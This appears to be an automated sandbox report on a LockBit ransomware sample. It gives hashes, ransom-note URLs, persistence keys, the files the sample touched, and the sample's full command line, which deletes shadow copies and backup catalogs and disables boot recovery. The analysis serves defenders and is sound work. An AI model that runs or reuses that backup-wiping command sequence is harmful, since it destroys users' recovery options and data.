Analysis
-
max time kernel
133s -
max time network
45s -
platform
windows7_x64 -
resource
win7-20220414-en -
submitted
08-05-2022 16:33
Static task
static1
Behavioral task
behavioral1
Sample
c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe
Resource
win10v2004-20220414-en
General
-
Target
c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe
-
Size
184KB
-
MD5
112c68cbae5ed25313f277f0a7721ecf
-
SHA1
5a7420f8fe3b81647714b16eed52bfc3ce149d5a
-
SHA256
c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297
-
SHA512
fd433cefa7e9a9e0edf85d068644e0749bc260d17ef31dd25b953a5ca2e69a974a491c285c503b6aa3588ea2e5d4a5d9015c8f4f25746f3905a443d6ba4c143a
Malware Config
Extracted
C:\Program Files\7-Zip\Restore-My-Files.txt
lockbit
http://lockbit-decryptor.top/?96B283EF5B7ACD4CC03BD35F28F1ECAF
http://lockbitks2tvnmwk.onion/?96B283EF5B7ACD4CC03BD35F28F1ECAF
Signatures
-
Lockbit
Ransomware family with multiple variants released since late 2019.
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 2800 bcdedit.exe 2812 bcdedit.exe -
Processes:
wbadmin.exepid process 2824 wbadmin.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe Set value (str) \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Windows\CurrentVersion\Run\XO1XADpO01 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe\"" c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
Processes:
c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exepid process 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe -
Drops file in Program Files directory 64 IoCs
Processes:
c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exedescription ioc process File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-windows_ja.jar c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe File opened for modification C:\Program Files\7-Zip\Lang\he.txt c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Accra c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\El_Aaiun c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\feature.xml c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-uisupport_ja.jar c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe File created C:\Program Files\VideoLAN\VLC\locale\ca\LC_MESSAGES\Restore-My-Files.txt c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe File opened for modification C:\Program Files\7-Zip\Lang\io.txt c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\Restore-My-Files.txt c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\etc\Restore-My-Files.txt c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_hu.jar c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\toc.gif c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\de-DE\js\calendar.js c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyclient.jar c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\feature.properties c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\META-INF\Restore-My-Files.txt c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_mru_on_win7.css c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Tarawa c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe File opened for modification C:\Program Files\Microsoft Games\Multiplayer\Checkers\fr-FR\chkrzm.exe.mui c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\images\delete_up.png c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe File opened for modification C:\Program Files\CopyReset.rar c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Riga c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Cairo c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Nome c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe File created C:\Program Files\VideoLAN\VLC\lua\sd\Restore-My-Files.txt c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe File opened for modification C:\Program Files\Windows Media Player\es-ES\wmpnetwk.exe.mui c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\fr-FR\settings.html c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\de-DE\css\currency.css c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.nl_zh_4.4.0.v20140623020002.jar c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\eclipse.inf c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-explorer_zh_CN.jar c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\Restore-My-Files.txt c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Cancun c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\SpecialNavigationLeft_SelectionSubpicture.png c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.console.nl_zh_4.4.0.v20140623020002.jar c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe File opened for modification C:\Program Files\7-Zip\Lang\hu.txt c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe File opened for modification C:\Program Files\Microsoft Games\Chess\it-IT\Chess.exe.mui c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\ZoneInfoMappings c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe File created C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\ja-JP\Restore-My-Files.txt c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe File opened for modification C:\Program Files\7-Zip\Lang\hr.txt c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Dublin c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe File opened for modification C:\Program Files\Java\jre7\lib\security\java.policy c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-api_zh_CN.jar c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_sv.properties c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\NavigationUp_ButtonGraphic.png c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Buenos_Aires c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\contbig.gif c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.base.nl_zh_4.4.0.v20140623020002.jar c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-ui_ja.jar c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Marengo c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe File opened for modification C:\Program Files\DVD Maker\directshowtap.ax c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\psfont.properties.ja c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe File opened for modification C:\Program Files\Microsoft Games\Purble Place\de-DE\PurblePlace.exe.mui c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\corner.png c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainToScenesBackground.wmv c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Maldives c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.di.extensions_0.12.0.v20140417-2033.jar c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\es-ES\gadget.xml c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Perf_Scenes_Mask1.png c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Johannesburg c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Lima c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Thule c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\batch_window.html c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\background.png c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 1020 vssadmin.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exepid process 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe -
Suspicious use of AdjustPrivilegeToken 48 IoCs
Processes:
c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exevssvc.exeWMIC.exewbengine.exedescription pid process Token: SeTakeOwnershipPrivilege 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe Token: SeDebugPrivilege 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe Token: SeBackupPrivilege 2024 vssvc.exe Token: SeRestorePrivilege 2024 vssvc.exe Token: SeAuditPrivilege 2024 vssvc.exe Token: SeIncreaseQuotaPrivilege 2712 WMIC.exe Token: SeSecurityPrivilege 2712 WMIC.exe Token: SeTakeOwnershipPrivilege 2712 WMIC.exe Token: SeLoadDriverPrivilege 2712 WMIC.exe Token: SeSystemProfilePrivilege 2712 WMIC.exe Token: SeSystemtimePrivilege 2712 WMIC.exe Token: SeProfSingleProcessPrivilege 2712 WMIC.exe Token: SeIncBasePriorityPrivilege 2712 WMIC.exe Token: SeCreatePagefilePrivilege 2712 WMIC.exe Token: SeBackupPrivilege 2712 WMIC.exe Token: SeRestorePrivilege 2712 WMIC.exe Token: SeShutdownPrivilege 2712 WMIC.exe Token: SeDebugPrivilege 2712 WMIC.exe Token: SeSystemEnvironmentPrivilege 2712 WMIC.exe Token: SeRemoteShutdownPrivilege 2712 WMIC.exe Token: SeUndockPrivilege 2712 WMIC.exe Token: SeManageVolumePrivilege 2712 WMIC.exe Token: 33 2712 WMIC.exe Token: 34 2712 WMIC.exe Token: 35 2712 WMIC.exe Token: SeIncreaseQuotaPrivilege 2712 WMIC.exe Token: SeSecurityPrivilege 2712 WMIC.exe Token: SeTakeOwnershipPrivilege 2712 WMIC.exe Token: SeLoadDriverPrivilege 2712 WMIC.exe Token: SeSystemProfilePrivilege 2712 WMIC.exe Token: SeSystemtimePrivilege 2712 WMIC.exe Token: SeProfSingleProcessPrivilege 2712 WMIC.exe Token: SeIncBasePriorityPrivilege 2712 WMIC.exe Token: SeCreatePagefilePrivilege 2712 WMIC.exe Token: SeBackupPrivilege 2712 WMIC.exe Token: SeRestorePrivilege 2712 WMIC.exe Token: SeShutdownPrivilege 2712 WMIC.exe Token: SeDebugPrivilege 2712 WMIC.exe Token: SeSystemEnvironmentPrivilege 2712 WMIC.exe Token: SeRemoteShutdownPrivilege 2712 WMIC.exe Token: SeUndockPrivilege 2712 WMIC.exe Token: SeManageVolumePrivilege 2712 WMIC.exe Token: 33 2712 WMIC.exe Token: 34 2712 WMIC.exe Token: 35 2712 WMIC.exe Token: SeBackupPrivilege 2884 wbengine.exe Token: SeRestorePrivilege 2884 wbengine.exe Token: SeSecurityPrivilege 2884 wbengine.exe -
Suspicious use of WriteProcessMemory 19 IoCs
Processes:
c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.execmd.exedescription pid process target process PID 1836 wrote to memory of 960 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe cmd.exe PID 1836 wrote to memory of 960 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe cmd.exe PID 1836 wrote to memory of 960 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe cmd.exe PID 1836 wrote to memory of 960 1836 c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe cmd.exe PID 960 wrote to memory of 1020 960 cmd.exe vssadmin.exe PID 960 wrote to memory of 1020 960 cmd.exe vssadmin.exe PID 960 wrote to memory of 1020 960 cmd.exe vssadmin.exe PID 960 wrote to memory of 2712 960 cmd.exe WMIC.exe PID 960 wrote to memory of 2712 960 cmd.exe WMIC.exe PID 960 wrote to memory of 2712 960 cmd.exe WMIC.exe PID 960 wrote to memory of 2800 960 cmd.exe bcdedit.exe PID 960 wrote to memory of 2800 960 cmd.exe bcdedit.exe PID 960 wrote to memory of 2800 960 cmd.exe bcdedit.exe PID 960 wrote to memory of 2812 960 cmd.exe bcdedit.exe PID 960 wrote to memory of 2812 960 cmd.exe bcdedit.exe PID 960 wrote to memory of 2812 960 cmd.exe bcdedit.exe PID 960 wrote to memory of 2824 960 cmd.exe wbadmin.exe PID 960 wrote to memory of 2824 960 cmd.exe wbadmin.exe PID 960 wrote to memory of 2824 960 cmd.exe wbadmin.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe"C:\Users\Admin\AppData\Local\Temp\c2b9c0a1456fdf1ad57b1662920394a7b5eea096517e0e934397b0092ed66297.exe"1⤵
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet3⤵
- Interacts with shadow copies
-
C:\Windows\System32\Wbem\WMIC.exewmic shadowcopy delete3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures3⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled no3⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\wbadmin.exewbadmin delete catalog -quiet3⤵
- Deletes backup catalog
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
\??\PIPE\srvsvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/960-58-0x0000000000000000-mapping.dmp
-
memory/1020-59-0x0000000000000000-mapping.dmp
-
memory/1836-54-0x0000000076011000-0x0000000076013000-memory.dmpFilesize
8KB
-
memory/1836-55-0x000000000338B000-0x00000000033A2000-memory.dmpFilesize
92KB
-
memory/1836-56-0x0000000000240000-0x0000000000266000-memory.dmpFilesize
152KB
-
memory/1836-57-0x0000000000400000-0x00000000031E1000-memory.dmpFilesize
45.9MB
-
memory/2712-60-0x0000000000000000-mapping.dmp
-
memory/2800-61-0x0000000000000000-mapping.dmp
-
memory/2812-62-0x0000000000000000-mapping.dmp
-
memory/2824-63-0x0000000000000000-mapping.dmp
-
memory/2824-64-0x000007FEFC461000-0x000007FEFC463000-memory.dmpFilesize
8KB